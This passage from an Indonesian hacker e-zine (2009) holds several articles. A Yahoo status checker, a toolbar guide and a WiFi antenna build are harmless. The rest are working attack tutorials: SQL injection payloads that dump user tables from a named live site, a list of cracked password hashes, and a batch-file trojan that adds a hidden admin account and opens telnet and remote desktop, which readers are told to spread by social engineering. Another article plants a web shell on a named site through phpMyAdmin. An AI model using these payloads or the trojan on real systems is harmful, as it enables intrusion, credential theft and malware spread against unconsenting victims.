tidak Online xixixixixixixi .. ..
Next ..
Hhhmmmmmppp .. .. ..
Sssssssstttt !! ada sebuah website nih yang biasa
digunakan untuk mengecek status Ym.hehehehe .
Langkah nya sebagai berikut :
1.Buka Web http://Vizgin.com Tampilan Utama
Gambar dibawah .
2.Terus Masukin Id dari YM yang ingin kita ketahui
statusnya,Contoh : ingin mengetahui id YM :
Kutang_hansip sedang offline ataukah invisible,
seperti gambar
di bawah :
mailto:[email protected]:[email protected]:[email protected]://vizgin.com/http://vizgin.com/http://vizgin.com/mailto:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
26/71
- 25- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Sesudah masukin Id YM seperti gambar di atas
kemudian tekan Enter pada keyboard tunggu
beberapa detik maka akan kita ketahui status dari
Id Kutang_Hansip .hehehe si Agi susah bgt disuruh
invies jadinya :
Ternyata si Agi Online. nah itu status Id YM yg
Online Seperti gambar di atas . Tuh Gi loe dah exis
di artikel + senyuman loe yang MANIS.xixixixii
Seperti Gambar di bawah lah Status yang Invies tapi
si Cybernet lagi Online :
Silahkan masukin Id YM baru secara langsung dan kita
bisa lihat setatus dari YM yang kita inginkan sangat
mudah dan simple.hehehe
Masih banyak tips dan trik tentang Computer yang
lebih manjuuuuurr ..Selamat mencoba..
Pendamping : Mas.trisnowlaharwetan
Thx to :
@ Agitama
@ trisnowlaharwetan
@ Hackers Center.org
@ Spyrozone.net
/ Nick : Cybernet
/Location : Bandung-
Cilacap
/Email :
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
27/71
- 26- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Remote SQL Injection ExploitSQL Injection pada PHPRecipeBook 2.39
Writer : Necklord([email protected])
Nah, pada kesempatan kali ini gw mau membahas salah satu kelemahan
yang populer di dunia hacking, yaitu SQL Injection.
Kali ini target kita adalah PHPRecipeBook versi 2.39. PHPRecipebook adalah
script php opensource untuk menejemen resep makanan.
Kamu bisa download script ini di:
http://sourceforge.net/projects/phprecipebook/ , gratis n open source.
Ok, lets begin.
Disarankan mencoba di localhost, atau jika ingin mempraktikan sebaiknya menggunakan proxy.
Untuk gw sendiri, gw lebih suka nyoba langsung dari pada di localhost , karena itu, mari kita cari targetnya
dulu, pastinya lewat gooogle.
Gunakan syntax: inurl:"/index.php?m=" "PHPRecipeBook 2.39"
Gambar 1. Hasil Pencarian di Google
Waduh ternyata hasil pencarian menghasilkan banyak sekali situs, pilih yang mana nih. Gw lihat satu satu,
rupanya ada situs yang membuat gw menjadi tertarik, yaituwww.lowcarbohydratefoods.net . Ok, kalau begitu
gw langsung menuju ke TKP.
mailto:[email protected]:[email protected]:[email protected]://sourceforge.net/projects/phprecipebook/http://sourceforge.net/projects/phprecipebook/http://www.lowcarbohydratefoods.net/http://www.lowcarbohydratefoods.net/http://www.lowcarbohydratefoods.net/http://www.lowcarbohydratefoods.net/http://sourceforge.net/projects/phprecipebook/mailto:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
28/71
- 27- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Gambar 2. Waduh, langsung muncul resep
Wah, baru di klik aja langsung muncul resep, ckckckck. Yaudah langsung aja kita mulai injeksinya.
Kelemahan terdapat pada file index.php, terutama pada bagian search. Yaitu:
index.php?m=recipes&a=search&search=yes&course_id=[Nah Disini]
Bagian nah disini yang diberi warna merah bisa diisi oleh code code seperti:
-7+union+select+1,user_login,3,4,5,6,7+from+security_users
Jika Kode diatas dimasukan, maka akan muncul daftar username yang terdapat pada situs tersebut, nah untuk
mengetahui passwordnya cukup ganti user_login menjadi user_password (Sesuai dengan table security_users)
menjadi seperti ini:
-7+union+select+1,user_password,3,4,5,6,7+from+security_users
Nah ini daftar username yang ada:
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
29/71
- 28- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Gambar 3. Usernamenya banyak bangetz!
Wah, lihat usernamenya banyak bangetzzz Ditengah tengah ada username admin tuh, itu sasaran kita .
Nah, sekarang coba kita cari tahu passwordnya.
Gambar 4. Waduh, ga gampang lho!!!
Waduh RUPANYA PASSWORDNYA SEGUDANG!!! Di DECODE LAGI!!! Kita harus mencari tahu password si
admin, hmmm. Tadi kalo gw hitung admin berada di urutan ke 11, tapi ini tidak menjamin bahwa
passwordnya juga berada di urutan ke 11. Jadi secara untung untungan, gw coba password ke 11.
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
30/71
- 29- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Untuk menggunakan password itu, kita membutuhan sebuah md5 decrypter untuk men decrypt md5 hash
passwordnya. Gw pake tools yang disediain oleh kerinci.net yang bisa diakses di
http://tools.kerinci.net/?x=md5 .
Gambar 5. Beruntung! Md5 hash ditemukan!
Setelah hash ditemukan, munculah angka 8624266 sebagai hasilnya, lalu langsung saja gw coba.
Gambar 6. Gagal!
Wah, rupanya gagal, tapi gw memutuskan untuk tidak menyerah!!! Bagaimana jika dicoba secara masal?? Ok,gw akan coba.
Gw mencoba dengan 48 password hash dari pertama.
Gambar 7. Tidak semuanya berjalan dengan mulus!
Tidak semuanya berjalan dengan mulus, rupanya ada beberapa password yang tidak ditemukan oleh tool tsb,
jadi gw gunakan saja yang ada.
http://tools.kerinci.net/?x=md5http://tools.kerinci.net/?x=md5http://tools.kerinci.net/?x=md5 -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
31/71
- 30- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
e3ceb5881a0a1fdaad01296d7554868d [ 222222 ]8f9b97bf3fad640ca17e9627e6bba1fd [ michael1 ]ba9e42353a9b49c10c44f4bc7aa6e867 [ nascar ]e389cb43132a236f3c11e96d4557a28e [ cullen ]f0f02c8573be5de9dd53c49f3cd28656 [ kelsey ]0826b5c04738bedcc5ebc17dc643e103 [ erica ]
c592daf85aec99bd8f855e0299d0c88c [ booloo ]e9646d086a37906e5bec4323d3b37c9b [ snoopy ]3b73acb1ede1b4503409735604e6eb1a [ kruiden ]c5e29022e24ef7195fe60ee03f86d637 [ 8624266 ]361b259045c200a88bbcb3028a4115ff [ anaforlife ]629eeeebb23c16e7ebd4ccfe6456aae2 [ 228233 ]0d107d09f5bbe40cade3de5c71e9e9b7 [ letmein ]587915d98237ac0c8ac6da2f27343424 [ 1023jo ]e311dd5fd4cdbba780ea0d0062df7788 [ christina ]21d9c57c1d2ae58cf12ece8a3470666b [ ophelia ]7d0df4f46505d83bc7949dd1fb9c0db8 [ bailey ]0894398a6221a5138e48c4707c817b8a [ ribber ]60a8d9553442e861617b0e581768f651 [ domino ]8ee44d70bdc5f84c63804496ba66e333 [ john1953 ]e892f70829c1f7412842cd5d659cad4b [ jimmys ]
544720e1554ad7ec7c4931378d794751 [ 091302 ]c2800c7f1ccbe43bafdde1bf66c71209 [ blwalk ]a541714a17804ac281e6ddda5b707952 [ wisdom ]1e9c32b7ba6fefa76773d5c79bcdaad0 [ russell ]1613f36d06342303f69469f5a1b29c21 [ james1 ]fccf8b614092514a952436581857679d [ 031972 ]8db420479ffde71f56d59acbd23c3bf2 [ sacsbc ]81150c20187cd1e88948445ff5e57cb5 [ iluvthom ]aa1a7b903e4d011ce332c921c53c2708 [ heidiboo ]d8ae5776067290c4712fa454006c8ec6 [ samuel ]d3448803ba80ae9f938ba4a5b940cc07 [ RAPHAEL1 ]9cc939576d2f1dd7ec227996742c9664 [ qaz2wsx ]34f76d9adcbabd514b5a9824b2197421 [ edmonton ]a9fced156f931f6f5cfdcdd7ffd74127 [ gurli6 ]b8b2926bd27d4307569ad119b6025f94 [ 9676 ]
Baiklah, gw mulai mencobanya. Tapi dengan bantuan brutus
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
32/71
- 31- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Gambar 8. Brutus yang sudah diconfigurasi
Dan, setelah menunggu beberapa lama, ahkirnya . Usaha yang dilaksanakan secara sungguh sungguh pasti
membuahkan hasil, akhirnya gw berhasil login!!
Gambar 9. Usaha yang tidak sia sia.
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
33/71
- 32- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Gambar 10. Bisa langsung tambah resep
Jadi, jangan takut untuk mencoba!!
Author : Necklord
Email : [email protected]
Nick at Forum : Administrator
Thanks to : - God
- All of HC Staff & Members
- HC eMagazine Team
- Readers
mailto:[email protected]:[email protected]:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
34/71
- 33- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Add Ons Mozilla Made EasyCara Mudah dan Cepat Membuat Toolbar Browser
Writer : ciebal([email protected])
Setelah ciebal membuat Toolbar Hackers-Center untuk Mozilla n IE yang telah dipublish dan gunakan
oleh para member HC, kini ciebal akan sedikit membahas cara pembuatan toolbar dengan mudah
tanpa keahlian khusus dan semoga ini bisa menjawab pertanyaan-pertanyaan para member yang
bertanya tentang cara pembuatannya sehingga ada yang menganggap ciebal JAGO. Setelah membaca
artikel ini pasti anggapan bahwa ciebal JAGO akan pergi jauh-jauh dari pikiran kamu. Xixixixi..
Sebetulnya ada banyak software khusus untuk membuat Add Ons Mozilla tapi kali ini ciebal akan
mencoba membahas dengan bantuan Online Service pada conduit.com untuk proses pembuatannya.
Sebetulnya Add Ons Mozilla yang ber-ekstensi .xpi merupakan kumpulan file-file atau ekstensi untuk
mengkompress file seperti .zip atau .rar. Silahkan kamu coba ganti ektensi .xpi dengan .zip lalu bukafile tersebut dan apa yang kamu lihat..? Yah hanya sekumpulan file-file yang telah di kompress.
Ok deh, sekarang kita mulai untuk membuat ToolBar pribadi untuk website/blog sendiri, komunitas,
dll. Sekarang ikuti langkah berikut ini :
1. Buka situs www.conduit.com dan lakukan registrasi seperti biasa dan isikan data peribadikamu
2. Setalah proses registrasi selesai, kamu akan menerima email dari conduit.com dan silahkanlogin.
3.
Setelah login, untuk pertama kalinya kamu akan melihat wizard sebagai panduan untuk
menggunakan layanan ini. Tekan Start untuk memulai penggunaan.
mailto:[email protected]:[email protected]:[email protected]://www.conduit.com/http://www.conduit.com/http://www.conduit.com/mailto:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
35/71
- 34- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
4. Kamu akan dibawa pada cpanel account kamu, dan pasti kamu juga sudah mulai terbayangbagaimana cara menggunakannya.. :D
Segitu aja..? Emang Cuma segitu kok, sekarang kamu tinggal membuat toolbar kamu agar lebih cantik
dilihat.. Disini ciebal Cuma sedikit membahas tentang bagian-bagian pentingnya aja yah..
Sekarang kita coba edit sedikit toolbar kita ini sehingga menjadi lebih caktik untuk di gunakan di
firefox atau IE kita..
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
36/71
- 35- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
1. Edit Logo
Untuk mengedit logo cukup dengan mengklik pada live preview toolbar kita
lalu pilih edit, dan akan tampil seperti ini : (Silahkan edit sesuka kamu)
2. Menambah content ToolBar
Sekarang adalah proses pembuatan isi dari toolbar kamu, kamu bisa menambahkan link, radio,email notifier, serta aplikasi lainnya.
3. Silahkan berexplorasi lebih dalam untuk mempercantik ToolBar kamu..
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
37/71
- 36- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Yang istimewa pada layanan ini adalah kamu tidak perlu pusing-pusing menyediakan hosting dan
domain untuk menyimpang toolbar kamu. Contohnya HC memiliki domain untuk toolbar sendiri yaitu
www.hackers-center.ourtoolbar.com pada bagian ini ciebal membuat domain dengan nama
www.ciebal.ourtoolbar.com sebetulnya masih banyak lagi domain yang bisa kamu gunakan anda
tinggal setting saja.
Kamu juga bisa mendapatkan dolar dari toolbar ini, karena setiap ada orang yang menginstall ToolBar
yang kamu buat kamu akan mendapatkan 0.1 Dolar (kalau gak salah).
Lumayan kan..? selain mendapatkan dolar kamu juga jadi bisa melihat trafik pengguna ToolBar buatan
kamu, statistik diatas adalah hasil dari ToolBar HC yang di ambil screeshotnya pada tanggal 10 Juni
2009.
http://www.hackers-center.ourtoolbar.com/http://www.hackers-center.ourtoolbar.com/http://www.ciebal.ourtoolbar.com/http://www.ciebal.ourtoolbar.com/http://www.ciebal.ourtoolbar.com/http://www.hackers-center.ourtoolbar.com/ -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
38/71
- 37- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
OK, sekian dulu tutorial singkat dari ciebal. Mohon maaf karena aktikel ciebal ini t idak ada
hubungannya dengan hacking karena ciebal emang gak bisa klo soal Hacking-Hackingan. Xixixixxi..
Semoga bermanfaat, klo kurang jelas bisa menghubungi saya via email atau YM. Terimakasih..
/Nick at Forum : ciebal
/Location : Banten - Bandung
/Email :[email protected]@mugi.or.id
/Web:www.ciebal.web.id|www.indoblogger.web.id
/Thanks to:
Allah SWT, My Family, All My Friends, HC Staff, Indoblogger Community, omicron9194,
eminem, Paluared JS, Blackpaper, Quatum.Byte, chuwey, kemangi, aris lesmana, xyberbreaker,
All Reader, etc..
Tengkyu semuanya yang gak bisa disebutin satu-persatu.
mailto:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]://www.ciebal.web.id/http://www.ciebal.web.id/http://www.ciebal.web.id/http://www.indoblogger.web.id/http://www.indoblogger.web.id/http://www.indoblogger.web.id/http://www.indoblogger.web.id/http://www.ciebal.web.id/mailto:[email protected]:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
39/71
- 38- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Trojan UnDetected AV
Membuat Trojan Sederhana
Writer : eminem(www.eminem.com)
Trojan horse atau Kuda Troya, dalam keamanan komputer merujuk
kepada sebuah bentuk perangkat lunak yang mencurigakan
(malicious software/malware) yang dapat merusak sebuah sistem
atau jaringan. Dapat disebut sebagai Trojan
Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya
seperti virus komputer atau worm karena dua hal berikut:
Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkaliberbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus
komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem
menjadi crash.
Trojan tidak mereplikasi dirinya sendiri, sementara virus komputer dan worm melakukannya.
Trojan berjalan sebagai sebuah layanan sistem, dan bekerja di latar belakang ( background),
sehingga Trojan-Trojan tersebut dapat menerima perintah dari penyerang dari jarak jauh.
Ketika sebuah transmisi UDP atau TCP dilakukan, tapi transmisi tersebut dari port (yang berada
dalam keadaan "listening") atau alamat yang tidak dikenali, maka hal tersebut bisa dijadikan
pedoman bahwa sistem yang bersangkutan telah terinfeksi oleh Trojan Horse.Sumber 100% dari wikipedia
Sekarang di sini saya mempunyai sebuah script dari bat yang gunanya untuk membuka port dan
bisa untuk melakukan remote melewati telnet , sama hal nya seperti trojan :
http://www.eminem.com/http://www.eminem.com/http://www.eminem.com/http://www.eminem.com/ -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
40/71
- 39- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@echo offnet user eminem /add /expires:never
net localgroup administrators eminem /addecho Windows Registry Editor Version 5.00> c:\winst.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\winst.regecho "eminem"=dword:00000000>> c:\winst.regREGEDIT /S c:\winst.REGDEL c:\winst.REG
@echo off@echo REGEDIT4>user1.regecho. >>user1.regecho
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>user1.regecho. >>user1.regecho "ErrorControl"=dword:00000001>>user1.regecho "Start"=dword:00000002>>user1.regecho "Type"=dword:00000010>>user1.reg
@echo offecho "FailureActions"=hex#58;00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>user1.reg
echo. >>user1.regecho[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>user1.regecho. >>user1.regecho "NTLM"=dword:00000001>>user1.regecho "TelnetPort"=dword:29A>>user1.regecho offregedit /s user1.regecho offdel user1.reg
@echo off
echo Windows Registry Editor Version 5.00> c:\TS.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>> c:\TS.regecho "fDenyTSConnections"=dword:00000000>> c:\TS.regecho "fAllowToGetHelp"=dword:00000001>> c:\TS.regregedit /s c:\TS.regdel c:\TS.reg
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
41/71
- 40- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
@echo offecho Windows Registry Editor Version 5.00> c:\TS2.regecho[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>
c:\TS2.regecho "Start"=dword:00000002>> c:\TS2.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>> c:\TS2.regecho "AllowTSConnections"=dword:00000001>> c:\TS2.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>> c:\TS2.regecho "fDenyTSConnections"=dword:00000000>> c:\TS2.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>> c:\TS2.regecho "fAllowToGetHelp"=dword:00000001>> c:\TS2.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]>> c:\TS2.regecho "AllowMultipleTSSessions"=dword:00000001>> c:\TS2.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]>> c:\TS2.regecho "AutoAdminLogon"="1">> c:\TS2.regREGEDIT /S C:\TS2.REGREGEDIT -S C:\TS2.REGecho [Components] > c:\bootlog~.txtecho TSEnabled = on >> c:\bootlog~.txtsysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /qDEL c:\TS2.REGDEL c:\bootlog~.txt@start /b "iexplore.exe" www.hackers-center.org
Exit
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nb : di wajibkan untuk mengedit source di atas , karena nick saya terlalu ganteng. .
Perhatikan pada bagian , berikut ini .
net user eminem /add /expires:never
net localgroup administrators eminem /add
akan menambahkan user eminem
echo "TelnetPort"=dword:29A>>user1.reg
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
42/71
- 41- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
akan membuka telnet port 666 [karena 29A adalah hasil hex dari 666]
untuk merubahnya anda bisa mencoba menggunakan calculator,
Run Calc
Lihat gambar di bawah ini :
Cukup merubah Dec ke Hex
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
43/71
- 42- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Dan pada bagian :
@start /b "iexplore.exe" www.hackers-center.org
Apabila victim mengklik file bat ini akan membuka www.hackers-center.org yang gunanyauntuk merecord IP sang victim
Source Record Ip kira seperti ini .
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
NB : silakan mengeditnya apabila saya terlalu tampan
Ok sekarang kita mulai cara membuatnya, copy paste code bat pertama kedalam notepad dan
save dengan ekstensi bat [jangan lupa edit bagian2 pentingnya saja seperti user , port , rec IP]. [anda bisa merubahnya dengan exstensi exe menggunakan tools seperti bat2exe yang bisa
di download dihttp://www.battoexe.com] setelah itu silakan anda sebarkan file bat atau exe
tadi di jagad maya ini atau anda bisa melakukan percobaan dengan teman anda , yeah
tentunya menggunakan tehnik soceng , dan yang lbh asiknya tidak 1 AV pun berhasil
membacanya sebagai malicious code . setelah itu anda hanya perlu mengecek site record IP
yang anda buat tadi dan anda bisa meremote melalui telnet dengan port 666 [ saya pernah
mencobanya dengan Remote Dekstop dan berhasil ]
Ok sekian artikel dari orang tampan seperti saya
Terima kasih .
Thanks to My Brotherhood : bob , zeth , oki , pizzy , agus , jack , revan ,dan brotherhood lainnya
jangan pernah biarkan otak mu sadar teman.
http://www.hackers-center.org/http://www.battoexe.com/http://www.battoexe.com/http://www.battoexe.com/http://www.battoexe.com/http://www.hackers-center.org/ -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
44/71
- 43- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Antena ASTRO HolicAntena Astro Holic
Writer : root([email protected])
Disini kita memanfaatkan sebuah Disc ASTRO yang sudah ga dipakai
lagi, daripada kebuang sia-sia mendingan kita pakai buat antena
WiFi.
Kita siapkan bahan-bahan dulu..
Bahan yang dibutuhkan adalah:
1. Pipa PVC ukuran 3, panjang 24cm
2. Tutup pralon / dop pipa ukuran 3 2buah
3. Tutup pralon / dop pipa ukuran 1 1buah
4. Mur Baut panjang 2cm
5. Alumunium foil
6. USB WiFi
7. Kabel UTP panjang max 15 Meter
8. Kabel sambungan USB
Bahan yang utama untuk membuat Antena adalah poin 1 6, jika sudah mempunyai kabel
perpanjangan USB tidak perlu menyiapkan poin 7 & 8.
Langsung aja kita praktek
a. Ambil dop pipa ukuran 3 & 1, kita lubang pas ditengah seukuran baut yg sudah kita
siapkan. Lalu kita tempelkan secara berlawanan & baut kencang kedua dop pipa
tersebut.
mailto:[email protected]:[email protected]:[email protected]:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
45/71
- 44- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
b. Lapisi bagian dalam dop ukuran 3 dengan alumunium foil.
c. Selanjutnya ambil pralon pvc 3, lubangi seukuran slot USB untuk memasukkan USB
WiFinya, ukuran 5cm dari bibir pralon. Dan buat garis 19cm dari bibir tersebut untuk
area alumuniumfoil.
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
46/71
- 45- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
d. Masukkan USB WiFinya kedalam pralon lalu tutup dengan dop yang telah kita buat tadi.
Dop yang ada lapisan alumunium foilnya pasang di sebelah paling dekat dengan lubang
USB. Ingat!! Dop paling ujung jangan dilapisi alumunium..
e. Pasang rangkaian pralon tadi pada tangkai antena ASTRO yang telah kita siapkan.
Selesai sudah prakaria kita, saatnya ujicoba scan sinyal dengan software Network
Stumbler.
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
47/71
- 46- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Hasil dari scan sinyal
Nah selamat berkarya, kalo ada yang bisa bikin lebih sensitif lagi silahkan di share
Kita kembangkan cara ini, siapa tau bisa ngalahin antena GRID pabrikan hehehehehee
root@HC A.K.A [email protected]
foto lebih komplit ada disinihttp://dl.getdropbox.com/u/324971/antena/foto.html
mailto:[email protected]:[email protected]://dl.getdropbox.com/u/324971/antena/foto.htmlhttp://dl.getdropbox.com/u/324971/antena/foto.htmlhttp://dl.getdropbox.com/u/324971/antena/foto.htmlhttp://dl.getdropbox.com/u/324971/antena/foto.htmlmailto:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
48/71
- 47- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
PhpMyAdmin VulnerabilityGetting Windows Shell with phpMyAdmin
Writer : Coco_nk4l([email protected])
Gw yakin kalo banyak dari loe semua dah pada tau apa itu
namanya shell??? Yups bagi gw shell adalah Backdoor buat
system pada suatu site, bayangin loe gak perlu tau password dr
cpanel, loe bisa cari tw passwordnya, lo bisa utak utik file
managernya nambah file ato hapus file atau deface tugh site
sekalian, pada umumnya shell sering kita jumpai dengan system
operasi Linux, walaupun gak menutup kemungkinan shell yang
kita dapetin adalah basis Windows, nah pertanyaan gimana cara
bedainnya antara tugh shell pake OS windows ato pake OS linux???
Yang membedakan yaitu pada bagian uname-a akan terdapat jenis windows yg di pake kalo
kalian menggunakan shell dengan jenis (c99), disini gw gak bakalan jelasin secara detail apaan
itu shell, fungsinya apaan aja, tp dsini gw Cuma ingin share pengetahuan gw tentang gimana
cara dapet Shell windows menggunakan kelemahan ato vulnerability dari phpmyadmin dan
xampp, langsung aja kita coba
Yang harus loe siapkan :
PC dengan Koneksi Internet tentunyaKesabaran
Script Shell yang udah di encode menjadi base64 kalian bisa ambil dihttp://geocities.com/kyo2_2004/alat/shell_64.txt Pengetahuan ttg google dork untuk variasi target
Kopi plus rokok n camilan kalo perlu
Yang pertama kita lakukan setelah semua kebutuhan terpenuhi yaitu, kita musti cari target
dahulu, pertama coba lakukan pencarian target dengan bantuan paman Google, Dork yang kita
gunakan adalah Inurl:/xampp/lang.php?bisa jugakita variasi untuk ke suatu Negaratertentu saja.
mailto:[email protected]:[email protected]:[email protected]://geocities.com/kyo2_2004/alat/shell_64.txthttp://geocities.com/kyo2_2004/alat/shell_64.txthttp://geocities.com/kyo2_2004/alat/shell_64.txtmailto:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
49/71
- 48- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Setelah melakukan pencarian coba aja kita cari target, kali ini gwa kasih contoh targetnya
adalah..
http://racewarz.org/xampp/lang.php?it
Kita lihat diatas adalah tampilan dari phpmyadmin dari sitehttp://racewarz.org/
http://racewarz.org/xampp/lang.php?ithttp://racewarz.org/xampp/lang.php?ithttp://racewarz.org/http://racewarz.org/http://racewarz.org/http://racewarz.org/http://racewarz.org/xampp/lang.php?it -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
50/71
- 49- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Nah kalo udah dsana ada Tulisan phpmyadmin, coba loe buka apakah bisa kita akses secara langsung
atokah harus make login, ternyata gak perlu login kita dah bisa masuk kedalam phpmyadmin yang
bentuknya kurang lebih seperti gambar di bawah ini
Setelah kita masuk phpmyadmin kita buka Querywindow yang di wakili ama icon kotak bertuliskan SQL.
Dan akan muncul popup seperti berikut
Dalam popup itu kita bisa inject perintah2 SQL, nah disini silahkan kalian masukan code seperti ini :
SELECT script shell hasil encode INTO OUTFILE lokasi DOCUMENT_ROOT(htdocs)
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
51/71
- 50- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Ket:
Lokasi htdocs : lokasi dimana isi dari semua site tersimpan cara untuk mengetahuinya yaitu dengancara membuka halaman phpinfo
http://www.racewarz.org/xampp/phpinfo.phpato bisa juga klik tulisan phpinfo() pada tampilan
phpmyadmin, yang hasilnya kurang lebih seperti ini
Nah kalo udah hasil script yang kita masukan kedalam Query window adalah sebagai berikut:
SELECT INTO isi script shell INTO OUTFILE "C:/xampp/htdocs/hc.php"
Penjelasan:
Isi script shell gak gw tulis soalnya terlalu banyak
http://www.racewarz.org/xampp/phpinfo.phphttp://www.racewarz.org/xampp/phpinfo.phphttp://www.racewarz.org/xampp/phpinfo.php -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
52/71
- 51- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Nah dsana ada c:/xampp/htdocs dimana itu adalah lokasi DOCUMENT_ROOT ato lokasi file2
web di simpan,
Dan hc.php adalah nama file dari shell yang gw tanam.
Kalo udah tekan tombol GO
Dan kita tunggu sesaat sampe proses dari phpmyadmin selesai kalo udah semua prosesnya,
kita bakalan lead hasilnya
Dihttp://www.racewarz.org/hc.phpdanhasilnya adalah seperti gabar di bawah:
http://www.racewarz.org/hc.phphttp://www.racewarz.org/hc.phphttp://www.racewarz.org/hc.phphttp://www.racewarz.org/hc.php -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
53/71
- 52- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Shell windows dah di tanggan, untuk command2 yang di pake berbeda dengan shell Linux,
command yang akan kita pakai yaitu command yang sama seperti kita gunain CMD ato Ms
Dos.
Oke, sekian dulu goresan tangan gw semoga bisa menambah pengetahuan loe semua tantangnamanya seucurity dalam Web ato dunia bawah tanah.
Moga loe semua gak bosen dengan tulisan gw, sekali lagi terima kasih
Salam
Coco A.K.A Nk4l
Hackers-Center Balikita Yogyafree HD Team| UnderDos | MetroPolix | R00t | Niko A.K.A Biadabz | AK-47| GT-5|
|inc0mp13te | X-shadow | Jeje | Ramz | Agitama | Gorontalo Defacer |
| Indonesian Coder | Cukdu$ Crew | Tuban Hackerlink | Deantique |
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
54/71
- 53- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Sniffing Jaringan with Cain & AbelMengintip Password Orang dalam Jaringan
Writer : phychole([email protected])
Welcome, salam kenal. Ini tutorial yang udah basi. Ini aku peruntukan untuk yang baru mengenal
jaringan jadi untuk para master numpang nulis dan kalo ada kesalahan mohon bimbingannya. Cain
merupakan tools lengakap untuk berbagai aktifitas. Kali ini saya akan memberi tutorial tentang sniffing
menggunakan Cain & Abel. Yang kalian butuhkan yaitu:
